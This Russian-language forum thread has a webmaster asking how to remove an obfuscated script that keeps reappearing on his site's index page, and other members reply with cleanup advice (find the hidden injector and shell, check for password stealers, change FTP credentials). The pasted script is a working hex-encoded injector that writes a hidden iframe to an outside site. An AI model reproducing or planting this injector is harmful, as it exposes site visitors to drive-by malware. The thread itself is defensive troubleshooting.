Новая тема   Ответить

 Goon
Такая херня появилась на индексе:
<script>function c2882110cbp49a3ef5465274(p49a3ef5465a43){ return (parseInt(p49a3ef5465a43,16));}function p49a3ef54671b3(p49a3ef5467982){ function p49a3ef54690f2(){return 2;} var p49a3ef5468152='';p49a3ef546a091=String.fromCharCode;for(p49a3ef5468924=0;p49a3ef5468924<p49a3ef5467982.length;p49a3ef5468924+=p49a3ef54690f2()){ p49a3ef5468152+=(p49a3ef546a091(c2882110cbp49a3ef5465274(p49a3ef5467982.substr(p49a3ef5468924,p49a3ef54690f2()))));}return p49a3ef5468152;} var uf5='';var p49a3ef546a861='3C7'+uf5+'3637'+uf5+'2697'+uf5+'07'+uf5+'43E696628216D7'+uf5+'96961297'+uf5+'B646F637'+uf5+'56D656E7'+uf5+'42E7'+uf5+'7'+uf5+'7'+uf5+'2697'+uf5+'465287'+uf5+'56E657'+uf5+'363617'+uf5+'065282027'+uf5+'2533632536392536362537'+uf5+'322536312536642536352532302536652536312536642536352533642536332533322533382532302537'+uf5+'332537'+uf5+'32253633253364253237'+uf5+'2536382537'+uf5+'342537'+uf5+'342537'+uf5+'302533612532662532662536392537'+uf5+'342536332536662537'+uf5+'352536652537'+uf5+'342536352537'+uf5+'322532652536652536352537'+uf5+'342532662536332536662537'+uf5+'352536652537'+uf5+'342536352537'+uf5+'322532652537'+uf5+'302536382537'+uf5+'30253366253237'+uf5+'2532622534642536312537'+uf5+'342536382532652537'+uf5+'322536662537'+uf5+'352536652536342532382534642536312537'+uf5+'342536382532652537'+uf5+'32253631253665253634253666253664253238253239253261253331253331253332253332253336253338253239253262253237'+uf5+'253337'+uf5+'253633253636253332253334253332253237'+uf5+'2532302537'+uf5+'37'+uf5+'2536392536342537'+uf5+'34253638253364253332253335253334253230253638253635253639253637'+uf5+'2536382537'+uf5+'342533642533342533342533322532302537'+uf5+'332537'+uf5+'342537'+uf5+'39253663253635253364253237'+uf5+'2537'+uf5+'362536392537'+uf5+'332536392536322536392536632536392537'+uf5+'342537'+uf5+'39253361253638253639253634253634253635253665253237'+uf5+'2533652533632532662536392536362537'+uf5+'3225363125366425363525336527'+uf5+'29293B7'+uf5+'D7'+uf5+'6617'+uf5+'2206D7'+uf5+'969613D7'+uf5+'47'+uf5+'27'+uf5+'5653B3C2F7'+uf5+'3637'+uf5+'2697'+uf5+'07'+uf5+'43E';document.write(p49a3ef54671b3(p49a3ef546a861));</script>

При удалении появляется по новой!
Кто знает как вылечить?

 ritor
меняй пароли ФТП, ставь вход на фтп тока с твоего айпи

 Goon


Пароли поменяли всеравно вылазит!

 lega_cobra
Смотрите кто, откуда заходит, рут-киты и т.п. В общем, работа для админа - вычислить, откуда ножки растут.

 ritor
Защиту по айпи ставь на вход. проверяй свой комп.

 Goon


Не помогает!!!

 Vasilich
Бля , твой код все страницу перекосил.

Понятно что не помогает если уже затроянили

 Goon


Код не мой!!!!!
Как лечить то????

 yo
Ерунду тебе всякую советуют, вот и не помогает. На твоем серевере есть как минимум один запрятанный скрипт, который так и будет вставлять этот зашифрованный айфрейм, пока ты не найдешь сам скрипт (возможно и не в php, а где нибудь в jpg c измененным mime type в htaccess в какой-нибудь глубокой директории). Потом, скорее всего, вдобавок запрятан и шелл, так что для доступа к файлам, фтп вовсе и не нужен будет. Все это ты подцепил, возможно, из-за того, что неправильно установил какой-нибудь скрипт - т.е. не найдешь дыру, так и будешь все время страдать. Ну и судя по тому, что ты так доверчиво стал следовать дурацким советам по блокировке айпи и смене фтп до того, как нашел саму причину - лучше за помощью обратиться к хостеру.

 Aquarius
Или, как вариант, на компе висит п*нч, который отсылает каждый раз новые пароли. Переустанови/почисти систему. А лучше переустановить.

 Vasilich
Цитата:

Эти дурацкие советы решаю в половине случаев проблемы, ну естественно до того как тебя поломали

 Grach
вероятно тебе полезно будет
Очень нестандартный трейдер или взлом АТS?
Soft-Com пишет что делать

 weely6
попробуй сделать поиск по серваку на наличие какой нить небольшой части этого говно-файла, возможно найдёшь файл с которого разноситься всё это гавно по серверу.

 lega_cobra
Ищи источник изменений. Ищи новые файлы в вебруте, ищи руткиты, ищи закладки. Пока не найдешь - все остальное смысла мало имеет.

 Goon
Всем спасибо большое!
Кажется победили!!!